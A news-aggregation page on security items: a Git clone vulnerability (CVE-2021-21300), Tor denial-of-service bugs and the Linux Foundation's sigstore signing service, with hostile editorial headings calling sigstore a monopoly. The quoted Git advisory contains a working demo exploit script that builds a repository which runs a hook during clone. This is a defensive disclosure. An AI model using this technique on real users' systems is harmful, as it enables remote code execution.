Language Selection

English French German Italian Portuguese Spanish

Security: Git, Tor, and Fake (Monopolised, Centralised) 'Security' From Linux Foundation

Filed under
Software
Security
  • "git clone" Hit By Vulnerability That Could Lead To Code Execution

    Disclosed today is CVE-2021-21300 as a security vulnerability affecting git clone that could lead to specially crafted repositories being able to execute code during the Git clone process.

    Git versions back to v2.15 are affected by this security vulnerability. Specially crafted repositories could execute code during the git clone process on case-insensitive file-systems supporting symbolic links. The vulnerability stems from clean/smudge filters being abused like those used by Git LFS.

  • The Tor Software Has Two Potential Denial Of Service Vulnerabilities, Fix Is Coming Next Week

    Current and previous versions for the Tor Onion Router software have two undisclosed Denial Of Service vulnerabilities with the potential to cause problems for the Tor networks authority servers. The Torproject will release a new version with a fix "early next week". Everyone who is using Tor Browser or running a Tor node should upgrade when it becomes available.

  • Linux Foundation Announces Free sigstore Signing Service to Confirm Origin and Authenticity of Software

    The Linux Foundation, the nonprofit organization enabling mass innovation through open source, today announced the sigstore project. sigstore improves the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

  • Industry-Wide Initiative to Support Open Source Security Gains New Commitments

    OpenSSF, a cross-industry collaboration to secure the open source ecosystem, today announced new membership commitments to advance open source security education and best practices. New members include Citi, Comcast, DevSamurai, Hewlett Packard Enterprise (HPE), Mirantis, and Snyk.

    Open source software (OSS) has become pervasive in data centers, consumer devices and services, representing its value among technologists and businesses alike. Because of its development process, open source has a chain of contributors and dependencies before it ultimately reaches its end users. It is important that those responsible for their user or organization’s security are able to understand and verify the security of this dependency supply chain.

'This vulnerability affects platforms with case-insensitive..."

  • git: malicious repositories can execute remote code while cloning
    Team,
    
    The Git project released new versions on Tuesday, March 9th 2021
    addressing CVE-2021-21300.
    
    This vulnerability affects platforms with case-insensitive filesystems
    with support for symbolic links, when certain clean/smudge filters are
    configured globally (e.g. Git LFS).
    
    The fixed versions are v2.17.6, v2.18.5, v2.19.6, v2.20.5, v2.21.4,
    v2.22.5, v2.23.4, v2.24.4, v2.25.5, v2.26.3, v2.27.1, v2.28.1, v2.29.3,
    and v2.30.2.
    
    Link to the announcement:
    https://lore.kernel.org/git/xmqqim6019yd.fsf@gitster.c.googlers.com/T/#u
    
    We highly recommend to upgrade.
    
    The addressed issue is:
    
    * CVE-2021-21300:
      On case-insensitive filesystems, with support for symbolic links,
      if Git is configured globally to apply delay-capable clean/smudge
      filters (such as Git LFS), Git could be fooled into running
      remote code during a clone.
    
      Demo exploit:
    
      #!/bin/sh
    
      git init delayed-checkout &&
      (
      	cd delayed-checkout &&
      	echo "A/post-checkout filter=lfs diff=lfs merge=lfs" \
      		>.gitattributes &&
      	mkdir A &&
      	printf '#!/bin/sh\n\necho PWNED >&2\n' >A/post-checkout &&
      	chmod +x A/post-checkout &&
      	>A/a &&
      	>A/b &&
      	git add -A &&
      	rm -rf A &&
      	ln -s .git/hooks a &&
      	git add a &&
      	git commit -m initial
      ) &&
      git clone delayed-checkout cloned
    
      With Git LFS enabled globally, this will print "PWNED" during the clone
      on case-insensitive file systems with support for symbolic links (such
      as NTFS, HFS+, etc).
    
    Credit for finding the vulnerability goes to Matheus Tavares who also
    worked with me on fixing it.
    
    Thanks,
    Johannes
    

Windows issue (mostly)

  • A Git security release

    Several new versions of the Git source-code management system have been released; they fix a vulnerability that could allow a hostile remote repository to execute code locally during a clone operation. Only users with case-insensitive filesystems are affected, reducing the set of possible targets considerably, but an update still seems like a good idea.

"Linux Foundation serves up free code-signing service"

  • Sign of the primes: Linux Foundation serves up free code-signing service • The Register

    The Linux Foundation, with the support of Google, Red Hat, and Purdue University, is launching a service called sigstore to help developers sign the code they release.

    Signing code involves associating a cryptographic signature with a specific digital artifact – release files, container images, and binaries – so that the person using the software can check the code's signature to verify that the release is authentic and hasn't been altered by someone along the way.

    "Sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain," said Luke Hinds, security engineering lead in Red Hat's office of the CTO, in a statement.

  • Linux Foundation announces new open-source software signing service | ZDNet

    The just-announced sigstore aims to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing backed by transparency log technologies. It will do this by empowering developers to securely sign software artifacts such as release files, container images, and binaries. These signing records will then be kept in a tamper-proof public log. This service will be free for all developers and software providers to use. The sigstore code and operation tooling that will be used to make this work is still being developed by the sigstore community.

Monopolists trying to centralise application trust

  • Sigstore is a Let’s Encrypt Like Software Signing Service for Open Source Software

    It’s evident that security for anything is a top priority now. And, ensuring that the software you use is genuine and developed by the original developers is even more important.

    Of course, there will always be pirated or modded software available but even with that, if they utilize code signing, you will be able to verify the source (if you trust them in the first place).

    Even though software signing is important and has a ton of benefits to ensure the integrity of the software, code signing isn’t something adopted by many developers.

IBM and Google are centralising and monopolising trust

  • Linux Foundation Debuts Sigstore Project for Software Signing

    Sigstore aims to improve the open source software supply chain by simplifying the process of cryptographic software signing.

  • Linux Foundation Debuts Sigstore Project for Software Signing

    The Linux Foundation has announced the launch of Sigstore, a new nonprofit initiative that aims to improve open source software supply chain security by making it easier for developers to adopt cryptographic signing for different components of the software development process.

  • Linux Foundation Project Secures Software Supply Chains - DevOps.com

    The Linux Foundation today embraced a sigstore project founded by Red Hat, Google and Purdue University to make it simpler for developers to employ cryptographic software, enabled by transparency log technologies, to secure software supply chains.

  • Linux Foundation is making it easier to verify the authenticity of software

    In a bid to secure the open source software supply chain, the Linux Foundation, together with Red Hat, Google, and Purdue University have combined to launch a new project to help developers cryptographically sign their software.

    Considering the constant increase in the rate of industrial adoption of open source software, the project, called sigstore, aims to prevent an attack on a public software repository from injecting tainted code in the supply chain.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO.

  • Linux Foundation launches free service to verify software authenticity

    The Linux Foundation, the non-profit organization enabling innovation through open source, has announced a new service to improve the security of the software supply chain by enabling the easy adoption of cryptographic software signing.

    Called 'sigstore' it will allow software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials will then be stored in a tamper-proof public log. Founding members of the project include Red Hat, Google and Purdue University.

  • Linux Foundation launches software signing service

    The Linux Foundation is launching “sigstore,” a free-to-use software signing certificate authority open to all developers.

    Code signing cryptographically authenticates that software has not been tampered with before installation. It can be a valuable tool to prevent hackers from co-opting patching systems or software distribution to deliver malware.

    But it can be a difficult feature for open source software producers to leverage, given the complexities of the process and key management.

NSA-connected spy companies promise us "tamper-proof encryption"

  • The Linux Foundation's "sigstore" project

    The Linux Foundation has announced a project called sigstore; its purpose is to protect against supply-chain attacks by signing (and verifying) release artifacts. "Very few open source projects cryptographically sign software release artifacts. This is largely due to the challenges software maintainers face on key management, key compromise / revocation and the distribution of public keys and artifact digests. In turn, users are left to seek out which keys to trust and learn steps needed to validate signing. Further problems exist in how digests and public keys are distributed, often stored on websites susceptible to hacks or a README file situated on a public git repository. sigstore seeks to solve these issues by utilization of short lived ephemeral keys with a trust root leveraged from an open and auditable public transparency logs."

  • The Linux Foundation Launches sigstore, a New Software Signing Service

    The Linux Foundation is launching its new sigstore project to provide better security and protection for all aspects of the software supply chain. The new project will enable developers to sign specific aspects of their development process, ensuring that files and other assets carry strong, tamper-proof encryption.

Outsourcing Linux trust to monopolies with terrible record

  • Sigstore is a Linux Foundation project developed by Google and Red Hat for code signing

    An inherent weakness of open source code is that it's difficult to determine its provenance and how it was built, which means that it's prone to supply chain attacks. Google aims to solve this problem which is why it has collaborated with Red Hat and Smallstep to introduce Sigstore (stylized "sigstore") in the Linux Foundation, making it easier to digitally sign and verify source code.

    [...]

    As it currently stands, sigstore has a fully functioning transparency log, but the WebPKI and client signing tooling is still in prototyping stage and is not ready for general use. The tool is open source and free to use for all developers. The development teams thinks that there are no privacy concerns involved as sigstore does not need access to any personal information except the OpenID Connect grant which will contain the user's email address. Future plans for sigstore include introducing support for other OpenID Connect providers, updating the documentation, completing the development of the remaining signing infrastructure, and hardening the system for general use. You can find out more about the project on the dedicated website here.

Another puff piece

  • Google and Red Hat team up with Linux Foundation for software-signing service

    The Linux Foundation has launched a free-to-use service for open source developers to cryptographically sign software to reassure users further down the supply chain that the software they’re using is legitimate.

    Developed in partnership with Google and Red Hat, the sigstore project will allow the open source community to sign software artefacts including release files, container images and binaries before these elements are stored in a public log.

Trusting NSA enablers for supply chain checks

  • Linux Foundation boosts security with crypto signing and ID credentialing groups

    The Linux Foundation has launched a “sigstore” project for improving software security via crypto software signing and transparency logs. The LF also announced new members for OpenSSF and launched a “DizmeID Foundation” for digital ID credentialing.

    The Linux Foundation announced the launch of a sigstore project for cryptographic software signing and announced new members for its Open Source Security Foundation (OpenSSF). Other recent Linux Foundation security announcements include the launch of a DizmeID Foundation for digital ID credentialing and a new commitment from Google and the LF to prioritize funds to underwrite two full-time maintainers for Linux kernel security development (see farther below).

Microsoft boosters support centralisation and monopolisation...

Linux Foundation PR/media partner TechRepublic

  • A new Linux Foundation open source signing tool could make secure software supply chains universal [Ed: Linux Foundation PR/media partner TechRepublic the latest to promote fake security]

    Called sigstore, the new cryptographic signing platform uses public logging similar to (but not the same as) cryptocurrencies and other blockchain technologies, the end result of which eliminates many of the security risks associated with traditional digital signing technologies. As opposed to using actual blockchains, sigstore uses transparency logs, which it said are more resilient to majority attacks, avoid canonicalization and are more mature.

Sigstore Project Aims to Monopolise Software Supply Chain

More puff pieces

How Open Source is responding to IT's Pearl Harbor.

Free sigstore signing service confirms software origin....

  • Free sigstore signing service confirms software origin and authenticity

    sigstore will empower software developers to securely sign software artifacts such as release files, container images and binaries. Signing materials are then stored in a tamper-proof public log. The service will be free to use for all developers and software providers, with the sigstore code and operation tooling developed by the sigstore community. Founding members include Red Hat, Google and Purdue University.

    “sigstore enables all open source communities to sign their software and combines provenance, integrity and discoverability to create a transparent and auditable software supply chain,” said Luke Hinds, Security Engineering Lead, Red Hat office of the CTO. “By hosting this collaboration at the Linux Foundation, we can accelerate our work in sigstore and support the ongoing adoption and impact of open source software and development.”

Sigstore Is A New And Free Code Signing Service By Linux Fdn.

  • Sigstore Is A New And Free Code Signing Service By Linux Foundation

    The Sigstore project will enable developers to sign specific aspects of their development process. This will ensure that files and other assets carry strong, tamper-proof encryption.

    The Linux Foundation, today announced the sigstore project. Founding members include Red Hat, Google and Purdue University. Sigstore improves the security of the software supply chain. It enabling the easy adoption of cryptographic software signing backed by transparency log technologies.

    An inherent weakness of open source code is that it’s difficult to determine its provenance how it was built. That means that it’s prone to supply chain attacks.

Still shilling monopoly disguised as 'security'

  • Linux Foundation Sigstore Aims to Be the Let's Encrypt of Code Signing

    Backed by the Linux Foundation, Sigstore aims to provide a non-profit service to foster the adoption of cryptographic signing by open source projects to make the software supply chain more secure.

    The main issue Sigstore attempts to tackle is the difficulty of knowing the origin of a piece of software, or how it was built. This becomes especially tricky when that software is included in a larger project, paving the way to external attacks. As Google security engineers Kim Lewandowski and Dan Lorenc put it introducing the initiative,

Comment viewing options

Select your preferred way to display the comments and click "Save settings" to activate your changes.

More in Tux Machines

digiKam 7.7.0 is released

After three months of active maintenance and another bug triage, the digiKam team is proud to present version 7.7.0 of its open source digital photo manager. See below the list of most important features coming with this release. Read more

Dilution and Misuse of the "Linux" Brand

Samsung, Red Hat to Work on Linux Drivers for Future Tech

The metaverse is expected to uproot system design as we know it, and Samsung is one of many hardware vendors re-imagining data center infrastructure in preparation for a parallel 3D world. Samsung is working on new memory technologies that provide faster bandwidth inside hardware for data to travel between CPUs, storage and other computing resources. The company also announced it was partnering with Red Hat to ensure these technologies have Linux compatibility. Read more

today's howtos

  • How to install go1.19beta on Ubuntu 22.04 – NextGenTips

    In this tutorial, we are going to explore how to install go on Ubuntu 22.04 Golang is an open-source programming language that is easy to learn and use. It is built-in concurrency and has a robust standard library. It is reliable, builds fast, and efficient software that scales fast. Its concurrency mechanisms make it easy to write programs that get the most out of multicore and networked machines, while its novel-type systems enable flexible and modular program constructions. Go compiles quickly to machine code and has the convenience of garbage collection and the power of run-time reflection. In this guide, we are going to learn how to install golang 1.19beta on Ubuntu 22.04. Go 1.19beta1 is not yet released. There is so much work in progress with all the documentation.

  • molecule test: failed to connect to bus in systemd container - openQA bites

    Ansible Molecule is a project to help you test your ansible roles. I’m using molecule for automatically testing the ansible roles of geekoops.

  • How To Install MongoDB on AlmaLinux 9 - idroot

    In this tutorial, we will show you how to install MongoDB on AlmaLinux 9. For those of you who didn’t know, MongoDB is a high-performance, highly scalable document-oriented NoSQL database. Unlike in SQL databases where data is stored in rows and columns inside tables, in MongoDB, data is structured in JSON-like format inside records which are referred to as documents. The open-source attribute of MongoDB as a database software makes it an ideal candidate for almost any database-related project. This article assumes you have at least basic knowledge of Linux, know how to use the shell, and most importantly, you host your site on your own VPS. The installation is quite simple and assumes you are running in the root account, if not you may need to add ‘sudo‘ to the commands to get root privileges. I will show you the step-by-step installation of the MongoDB NoSQL database on AlmaLinux 9. You can follow the same instructions for CentOS and Rocky Linux.

  • An introduction (and how-to) to Plugin Loader for the Steam Deck. - Invidious
  • Self-host a Ghost Blog With Traefik

    Ghost is a very popular open-source content management system. Started as an alternative to WordPress and it went on to become an alternative to Substack by focusing on membership and newsletter. The creators of Ghost offer managed Pro hosting but it may not fit everyone's budget. Alternatively, you can self-host it on your own cloud servers. On Linux handbook, we already have a guide on deploying Ghost with Docker in a reverse proxy setup. Instead of Ngnix reverse proxy, you can also use another software called Traefik with Docker. It is a popular open-source cloud-native application proxy, API Gateway, Edge-router, and more. I use Traefik to secure my websites using an SSL certificate obtained from Let's Encrypt. Once deployed, Traefik can automatically manage your certificates and their renewals. In this tutorial, I'll share the necessary steps for deploying a Ghost blog with Docker and Traefik.